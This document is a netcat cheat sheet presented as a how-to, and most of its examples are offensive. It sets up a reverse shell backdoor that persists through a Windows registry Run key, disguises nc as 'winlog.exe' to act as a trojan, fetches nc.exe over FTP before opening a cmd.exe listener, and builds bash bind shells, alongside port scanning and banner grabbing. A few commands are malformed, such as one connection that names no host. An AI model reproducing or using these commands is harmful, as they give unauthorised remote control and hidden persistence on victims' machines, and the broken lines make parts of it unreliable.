Netcat

[[ Description ]]

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

[[ Example ]]

Reverse Backdoor
Download Netcat and place in the windows\system32 directory.
**********************************************************************

Add a registry entry so that it connects each time the machine boots!
**********************************************************************
Reg add hklm\software\microsoft\windows\currentversion\run /v Mynetcat /t reg_sz /d “nc –d –e cmd.exe 192.168.1.173 555”
**********************************************************************
Setup listening port on remote machine
nc -l -v -p 555
**********************************************************************

Netcat Port Redirection
1. Computer A IP 10.10.10.1
2. Computer B IP 10.10.10.2
3. Open 1 DOS windows on computer A
4. Open 2 DOS windows on computer B
5. Type this in The DOS windows on A "nc -v -L -p 777 -e "nc
10.10.10.2 777“
6. Type this in The First DOS windows on B "nc -v -L -p 777“
7. Type this in The Second DOS windows on B"nc -v 10.10.10.1
777“
8. Now Type Stuff in Second DOS windows on B and you should
see them on the first DOS windows on B and A must notice
One connection made
nc -L -p 9000 -e "nc truemobile.net 9001"
nc -l -p 9000
********************************************************************************
Scanning with Netcat
nc -v -v -z 127.0.0.1 1-53
nc -v -v -z 127.0.0.1 21 25 53 139
nc -v -v -z example.host 80 139 1433
nc -v -v -z example.host 80 139 1433
nc -v -u -z -w 3 example.host 20-30
nc -v -v -z -u -r example.host 111 66-70 88 53 87 161-
164 121-123 213 49 2
nc -v -v -z -r example.host 21-25 42 53 66-80 107-118
137-139 156 161 162 389 568 569 1025 1027 1352
1433
***********************************************************************************
Banner Grabbing with Netcat
• nc -nvv xxx.xxx.xxx.xxx 80

• nc -nvv xxx.xxx.xxx.xxx 8080
• HEAD / HTTP/1.0
• [Carriage]
• [Carriage]
• nc -v www.website.com 80 < get.txt Retrieve from a
web site check for file presence.
• Your get.txt file will contain "GET HTTP/1.0\n\n"
echo "blahblahblah" | nc example.host 80 >
default.htm
cat get.txt | nc example.host 80
**************************************************************************************
Netcat as Trojan
• Netcat As Trojan
• @echo off
winlog.exe -L -d -p 139 -t -e cmd.exe (note
winlog.exe = nc.exe)
Once you ran the batch file on the box that
you want to trojan, telnet to it:
• c:\>nc -v [ipaddress of target] [port]
****************************************************************************************
Netcat FTP Stuff
• make the script
– echo user>GetNc.txt
– echo password>>GetNc.txt
– echo bin>>GetNc.txt
– echo get nc.exe>>GetNc.txt
– echo bye>>GetNc.txt
• run the script to get netcat
– ftp -s:GetNc.txt x.x.x.x
– del GetNc.txt
• run netcat
– nc -l -p 999 -t -e cmd.exe
****************************************************************************************
Netcat Connecting
• From outside the firewall connect to the
listening machine
nc -v xxx.xxx.xxx.xx 53
nc -p 31337 example.host 139
nc -v -v -p 31337 example.host 139
nc -w 5 -p 31337 example.host 139
nc -v -v -w 5 -p 31337 example.host 139
*****************************************************************************************
Netcat Connecting
• irc.cmd (Connect to an IRC server)
– @echo off
– echo Connecting you to IRC liberty.dal.us.dal.net
– nc -v 208.51.159.10 6667
– USER a a a a
– bbbbbbbbbb
********************************************************************************************
Compile Netcat under UNIX
• Unix Netcat Compile Option
• Compile netcat with -
DGAPING_SECURITY_HOLE then:
• nc -v -l -p 5050 -e '/bin/bash' (on the server)
• nc -v 5050 (on your box).
• you will enter your stuff on port 5050 and get
output on 5051
• nc -l -p 5050 | /bin/bash | nc -l -p 5051 2>&1
*********************************************************************************************

.